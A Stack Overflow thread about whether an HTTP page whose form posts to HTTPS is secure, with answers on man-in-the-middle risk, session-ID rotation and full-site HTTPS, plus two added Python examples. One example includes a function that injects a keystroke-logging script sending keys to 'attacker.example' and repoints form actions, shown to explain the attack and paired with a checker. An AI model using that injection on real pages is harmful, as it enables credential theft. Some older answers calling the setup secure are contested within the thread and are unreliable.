26

I have an HTTP page with a form. If I set the action to an HTTPS page, is the request secure? Does the browser process all the data before it sends it to the net? Or should I use HTTPS for my entire site?

Seybsen
Castro Roy
  • possible duplicate of [Is it secure to submit from a HTTP form to HTTPS?](http://stackoverflow.com/questions/274274/is-it-secure-to-submit-from-a-http-form-to-https) – RobEarl Sep 26 '13 at 10:43
  • Your accepted answer is generally regarded as outdated advice. Please see my response: http://stackoverflow.com/a/22625230/2179408 – Rob Bell Jul 29 '14 at 08:54

6 Answers

24

Yes, it'll be secure if the location your form is posting to is HTTPS.

Users, however, may freak out that there's no lock icon in their browser on the page with the form. You may be better off from a usability standpoint having both pages be HTTPS.

ceejayoz
  • So... is this answer wrong? The accepted answer here, and accepted + highest-voted answers [here](https://stackoverflow.com/a/274280/1175496) all suggest that the form could be subject to MITM attack? – Nate Anderson Jun 01 '17 at 19:24
  • @TheRedPea My answer is the technical one - a HTTP to HTTPS POST is indeed secure. The accepted answer is right (and accepted as such) for more practical reasons, that being that even if the HTTP to HTTPS is secure, the form on the HTTP site could be trivially MITMed to post somewhere *insecure*. – ceejayoz Jun 01 '17 at 19:26
12

No. Troy Hunt identifies a simple man-in-the-middle attack that shows that posting from HTTP to HTTPS is by no means secure. With the proliferation of free WiFi this attack would be very simple to execute.

http://www.troyhunt.com/2013/05/your-login-form-posts-to-https-but-you.html

Rob Bell
  • Posting in full HTTPS sites neither, I think. – Castro Roy Mar 27 '14 at 14:33
  • Sorry, @Kstro21, not sure what you mean. Do you mean that this exploit could still occur from HTTPS to HTTPS? The first page is encrypted between the server and the client, with no opportunity for the attacker to inject the script. – Rob Bell Mar 29 '14 at 08:33
  • So, posting from HTTPS to HTTPS will never be affected by a man-in-the-middle attack, no matter the used exploit. This is what you meant? – Castro Roy Mar 31 '14 at 16:19
  • There are still means of performing MITM attacks when posting HTTPS to HTTPS - e.g. if someone was able to adjust your list of trusted certificate authorities, or if a CA were compromised - but posting HTTPS to HTTPS dramatically lessens the opportunity for attack. The exploit that Troy Hunt identifies is a very real threat. The MITM attacks via compromised CAs far less so. – Rob Bell Apr 02 '14 at 12:27
7

Yes. As long as the request that needs to be secure is https, you're good.

That being said, many key sites, including gmail, have stopped bothering carving off small sections of their site to be https and just made their whole site https. It's easier and safer, and you lose little in the way of performance.

Scott Stafford
  • And boy, is it ever easier. Done properly, session IDs and such should really be regenerated every time a user switches between an HTTP/HTTPS connection. (This is to help minimize the risk of session-hijacking. Once a session ID has been passed in cleartext, it should be considered compromised, from a security perspective.) Having worked on two or three applications which were regenerating these IDs constantly, I can tell you from experience that it's a huge pain in the ass. Just locking into HTTPS only and committing to it is the only way to go, in my opinion. – Chris Allen Lane Apr 01 '12 at 00:23
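Added example, not code from the answer or the comment above and not from any real framework: a small Python session store that models the rotation rule Chris Allen Lane describes. An ID that has crossed an HTTP hop is treated as compromised, any switch between HTTP and HTTPS replaces the ID and invalidates the old one, and only an ID issued over HTTPS that has never travelled in cleartext is trusted for sensitive actions. The user names and the `touch`/`trusted` interface are assumptions made for the illustration.

```python
import secrets
from typing import Optional


class SessionStore:
    """Constructed example of the HTTP/HTTPS rotation policy: a session ID
    that has been sent over plain HTTP is considered compromised, so a
    scheme switch always issues a fresh ID, and a session that has ever
    been seen over HTTP is not trusted for sensitive actions until it has
    been rotated back onto HTTPS."""

    def __init__(self) -> None:
        # sid -> {"user": str, "last_scheme": "http"|"https", "exposed": bool}
        self._sessions = {}

    def create(self, user: str, scheme: str) -> str:
        sid = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._sessions[sid] = {"user": user, "last_scheme": scheme,
                               "exposed": scheme == "http"}
        return sid

    def lookup(self, sid: str) -> Optional[dict]:
        return self._sessions.get(sid)

    def touch(self, sid: str, scheme: str) -> Optional[str]:
        """Process a request that presented `sid` over `scheme`.
        Returns the ID the response must set in the cookie (a new one if
        the session was rotated), or None if `sid` is unknown."""
        entry = self._sessions.pop(sid, None)
        if entry is None:
            return None
        if scheme != entry["last_scheme"]:
            # Crossed the HTTP/HTTPS boundary: the old ID has been, or is
            # about to be, visible in cleartext. Replace it and drop the old one.
            return self.create(entry["user"], scheme)
        entry["exposed"] = entry["exposed"] or scheme == "http"
        self._sessions[sid] = entry
        return sid

    def trusted(self, sid: str) -> bool:
        """True only for an ID issued over HTTPS that has never travelled
        over HTTP: the only kind a login-protected action should accept."""
        entry = self._sessions.get(sid)
        return (entry is not None and not entry["exposed"]
                and entry["last_scheme"] == "https")


if __name__ == "__main__":
    store = SessionStore()
    sid = store.create("alice", "https")
    print("trusted over https:", store.trusted(sid))
    sid = store.touch(sid, "http")      # user wanders onto an HTTP page: rotated
    print("trusted after http hop:", store.trusted(sid))
    sid = store.touch(sid, "https")     # back to HTTPS: rotated again
    print("trusted after rotation:", store.trusted(sid))
```

The bookkeeping above is exactly what the answer says you avoid by serving everything over HTTPS: with a single scheme there is never a switch to detect, and the cookie can carry the Secure flag so the browser never sends it over HTTP in the first place.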
4

Don't do it!

Consider a MITM attack where an attacker sitting on the wire somewhere between the server and client modifies the login form before it reaches the client. The login form now includes a keylogger or points the POST action to a phishing page instead of the authentic server. There is no warning or UI cue for the end-user, so they go ahead and submit the form.

Consider a MITM attack that involves the attacker deploying a "free Wifi" at a coffee shop (via a smartphone hotspot or whatever). When unsuspecting people use this "free Wifi" to login with an HTTP form, even though it does a POST to HTTPS, the attacker can see the user's plaintext credentials by analyzing their hotspot network traffic.

References:

perry
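Added example, written for this page rather than taken from Rob Bell's or perry's answer or from Troy Hunt's article: a Python model of the attack both answers describe, and the check a site operator actually needs. `attacker_rewrite` does what someone on the path (a rogue "free WiFi" hotspot, say) can do to an HTTP response before the browser sees it: repoint the form action and append a keystroke-reporting script. `insecure_forms` then flags every form whose page or action is not HTTPS; note that the original, untampered page already fails that check, because an HTTPS action on an HTTP page is only as trustworthy as the HTTP page that carried it. The sample HTML and the host names are constructed for the illustration.

```python
import re
from urllib.parse import urljoin, urlsplit

# Constructed sample page: served over plain HTTP, but its form posts to
# HTTPS, which is exactly the setup the question asks about. The host
# names are hypothetical.
ORIGINAL_PAGE = """<html><body>
<form method="post" action="https://bank.example/login">
  <input name="user"><input name="pass" type="password">
  <button>Sign in</button>
</form>
</body></html>"""

# Simplified: matches double-quoted action attributes only.
ACTION_RE = re.compile(r'action="([^"]+)"', re.IGNORECASE)


def attacker_rewrite(html: str, attacker_origin: str) -> str:
    """Model of what an on-path attacker can do to an HTTP response before
    the browser renders it: repoint every form action at a server they
    control and append a script that reports keystrokes. Nothing
    authenticates the page, so the browser shows no warning."""
    rewritten = ACTION_RE.sub(f'action="{attacker_origin}/login"', html)
    keylogger = ('<script>document.addEventListener("keyup",e=>'
                 f'fetch("{attacker_origin}/k?c="+encodeURIComponent(e.key)))</script>')
    return rewritten.replace("</body>", keylogger + "</body>")


def insecure_forms(page_url: str, html: str) -> list:
    """Return the resolved action URL of every form whose submission an
    on-path attacker could capture or redirect. A form is only safe when
    the page carrying it AND its action are both https; a relative action
    inherits the page's scheme, so it is resolved against page_url."""
    page_scheme = urlsplit(page_url).scheme
    flagged = []
    for action in ACTION_RE.findall(html):
        target = urljoin(page_url, action)
        if page_scheme != "https" or urlsplit(target).scheme != "https":
            flagged.append(target)
    return flagged


if __name__ == "__main__":
    print("HTTP page, HTTPS action :",
          insecure_forms("http://bank.example/login", ORIGINAL_PAGE))
    tampered = attacker_rewrite(ORIGINAL_PAGE, "http://attacker.example")
    print("after on-path rewrite   :",
          insecure_forms("http://bank.example/login", tampered))
    print("HTTPS page, HTTPS action:",
          insecure_forms("https://bank.example/login", ORIGINAL_PAGE))
```

The rewrite is a few lines of string substitution; in practice the attacker's proxy does the same to every HTTP response it relays. The only way to deny them that position is the one the answers converge on: deliver the page with the form over HTTPS as well.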
3

The actual data transfer from your form to the server is encrypted when posting over HTTPS. If that is what you mean by secure, then yes, it is secure.

I think what you are getting at in your question is, what about client-side stuff reading the form prior to post. That is certainly possible, HTTPS or not.

On another note though, you should probably use HTTPS for the actual form. Some browsers warn users as their posts are redirected over the HTTP/HTTPS boundary. Plus, I don't think your users will be happy filling out a form where there is no secure icon showing.

Brad
2

If you set action to HTTPS this will indeed be secure. Before anything can happen over HTTPS a handshake has to occur, and the browser sending the data will have to do this when the action occurs.

m.edmondson